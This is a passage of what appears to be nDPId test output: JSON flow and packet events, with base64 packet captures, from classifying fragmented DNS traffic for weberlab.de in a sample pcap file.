+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1558968018075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVBbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAAASR\/DLMANfeJBdraSAoyhBAAAQACAAMACQNmZzIId2ViZXJsYWICZGUAAAEAAcAMAAEAAQAAADwABML3BArADAAuAAEAAAA8AR8AAQoDAAAAPF0J+51c4m0NkEcId2ViZXJsYWICZGUATmqKLyXYlD7oC1wjnJdPzxr55pJoGn6h+biEYxUlvjgkAKYGVr2OkUzNi9dPZZCT1\/wXWro5BadVhTNlYhGA9J99DHUUB5NEITFfyeoCqRwORKOIN8F3N4260XT5uRwPgDtpnX9J6IRQN3Hg639ASVUfreGkxN2At0j1oxD21UcoFDfwz5Fn7owm5vE3RP6EyTqHCPkRSCJvvZO+Lb6nyRwRS\/BgbrTAjIDB9gxMtXs7GIKlm\/T21iqqa\/CM0K3y9nYSv2Mbgyh+nhDaTp4WmMKZfRzP6DKGL+Myx7893ekGgWnaQNeZGzB3BTQVSEJFLULyYavsqtvSpVIspLF1IcBPAAIAAQAAADwADwNuczIId2ViZXJkbnPAWMBPAAIAAQAAADwABgNuczHBbMBPAC4AAQAAADwBHwACCgIAAAA8XQoA7FzibzWQRwh3ZWJlcmxhYgJkZQB0qMTaqgCspuIcPYiPf3BgfQDsq4tYGfT0QlWt5KJKITRcMICWR4fxmCxHuWlUNejQz2mbGhAzRSlcwKsiD4U6Q+uopuCYgHSJmt\/s0OjDPfudF4BOMw9+KVz84hDd\/4ac
sdDrEWjA3YvnyyflUhRrCvnRH+6JQJU80RMEvIAITMW4q+myuRsjD9B6QfjeeqqCUKrx5bwtdTeB0NT4gHxxjP3tHJ6Ez+B7TaCbOM5TtNYqTFI7mdspd2h6snRoEpvY7MK1Z3onr5DenD\/f6LB53lBHt6avjWu+uwwUOhqLcoi9In2I6kbfraddRWYM\/kcIQiOffZOZsRUnnKHK\/NLMwYMAHAABAAAOEAAQIAEEcHZbAAAAAAAACiUAU8FoABwAAQAADhAAECABBHAfCxawAAAAAAomAFPBgwABAAEAAA4QAATBGOPuwWgAAQABAAAOEAAEwvcFDsGDAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQCxSs6jI4fQc085O7XtX7BRqKJPIVj7R9A4dqni5pD4gtNCWOOQ49jwEV7+OJGrV9+bQHl4OIsfEGbPnNRiHD2rU2g12XuiewoGY6BET\/nnDTpid7zS7Y\/LN1BquV9W+umqOKnWTehPA142KT1sXmg\/uimXe8rUIwZkTczjR1eAjcGDAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQBBD7f476TWGU2sVH\/4at2erVKbOlwQPWLt9uQcMty7pDI7Tp7ZMWePK7xTYo+\/SKKtxGxsQm+Dw9BFS7QOZSkelOvY2K3W7IddWoZiKuHNL6ASQClSZKX4qKmE15GQqaQ+Q1hJxXO\/t3ZgmbUep+3HS0TBl3lNHnu26Kn\/p7RtMsFoAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQAHW3hBW4NpYOIt651fuskLdlXmIsxpk\/6w7e6123vRr4NG7O3Asyr4d5yzXO5X5MN06Mbt4dpvzarwCTZMS0Zq7X8cOvHMsuJZB4S9jSy92NfY76dqptuZmVYMHCcpQfQ5b5NEXqoHoi\/BNRsimfm2CW+D1vl+OXsGia3WBYBr+MFoAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQC2O9UUXwYnbNfGDKn296Q1feb4wr\/YEE8HV4OyiM\/YXI7FguC3V+KwiuEYnLO8UOUGgTTg1STXeWpc9EeYTA3q8WxKc1b6IIDbOhMAmEXs3UqT+QtwyRceovPAtklderZqHOphjXllMg=="} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00209{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":78,"global_ts_msec":1558968018075} 00432{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVADosQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAFqCR\/DLNPLB7MBpEmmg6EfwC\/W6kpyEkFynJ57OYAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1558968019069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1558968019069,"pkt":"AAwpil3XAIac51UUCABFAABXnz0AAGwRsyatwqlowRjj7uhIADUAQ+SwoX0AEAABAAAAAAABA2ZnMgh3ZWJlcmxhYgJkZQAAAQABAAApEAAAAIAAAA8ACAALAAI4ACABBHAfCxY="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1558968019069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAXc4hEgAEARds3BGOPurcKpaAA16EgF2oW\/oX2EEAABAAIAAwAJA2ZnMgh3ZWJlcmxhYgJkZQAAAQABwAwAAQABAAAAPAAEwvcECsAMAC4AAQAAADwBHwABCgMAAAA8XQn7nVzibQ2QRwh3ZWJlcmxhYgJkZQBOaoovJdiUPugLXCOcl0\/PGvnmkmgafqH5uIRjFSW+OCQApgZWvY6RTM2L109lkJPX\/BdaujkFp1WFM2ViEYD0n30MdRQHk0QhMV\/J6gKpHA5Eo4g3wXc3jbrRdPm5HA+AO2mdf0nohFA3ceDrf0BJVR+t4aTE3YC3SPWjEPbVRygUN\/DPkWfujCbm8TdE\/oTJOocI+RFIIm+9k74tvqfJHBFL8GButMCMgMH2DEy1ezsYgqWb9PbWKqpr8IzQrfL2dhK\/YxuDKH6eENpOnhaYwpl9HM\/oMoYv4zLHvz3d6QaBadpA15kbMHcFNBVIQkUtQvJhq+yq29KlUiyksXUhwE8AAgABAAAAPAAPA25zMQh3ZWJlcmRuc8BYwE8AAgABAAAAPAAGA25zMsFswE8ALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbi
r6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBaAABAAEAAA4QAATBGOPuwYMAAQABAAAOEAAEwvcFDsFoABwAAQAADhAAECABBHB2WwAAAAAAAAolAFPBgwAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTwWgALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwWgALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywYMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wYMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SV16tmoc6mGNeWUyTywezAaRJpoOhH8Av1upKchJBcpyeezmAAApEAAAAIA="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00209{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1558968019069} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAAm4hEAuUARm8rBGOPurcKpaAAADwAIAAsAAjgAIAEEcB8LFg=="} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1558968021013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968021013,"pkt":"AAwpil3XAIac51UUht1gBi\/8AEMRayoAFFBADAwAAAAAAAAAAQYgAQRwdlsAAAAAAAAKJQBT1J4ANQBDpiukOAAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1558968021014,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"thread_ts_msec":1558968021014,"pkt":"AIac51UUAAwpil3Xht1gCbz6A0ARQCABBHB2WwAAAAAAAAolAFMqABRQQAwMAAAAAAAAAAEGADXUngNAM\/ikOIQQAAEAAAAEAAEDZmcyCHdlYmVybGFiAmRlAAAcAAHAEAAGAAEAAAA8ADwDbnMwCHdlYmVyZG5zwBkJd2VibWFzdGVyCXdlYmVybmV0egNuZXQAeFhI6QAADhAAAAOEACTqAAAAADzAEAAuAAEAAAA8AR8ABgoCAAAAPF0SKiBc6o8QkEcId2ViZXJsYWICZGUAsAsLORY9T68251zcXXrXYMubapdXlnVZdczSZ8VjQS3g0dStlbXNUxRf4FJCpZevgIdkz+OzavU4Y3EyCKf5qxw7GiEllt+hznji85+jlwbqxa7BHuVrNf4YxsbIr0kaSblmtIn8e12vMQAgQIzOeK4VKGey+3rFftx2Cs7v0mw4V0Rd+gTYttfq+PLvGu8vSZibXFxqlj86VVzTwvOCEmjqKNyjon+\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAF
wWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1558968021026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1558968021026,"pkt":"AAwpil3XAIac51UUCABFAABEdWYAAGwRujZKfS+IwRjj7ufCADUAMBuRFagAEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1558968021027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAXciTwgAEARrMjBGOPuSn0viAA158IGrsPBFaiEEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NR
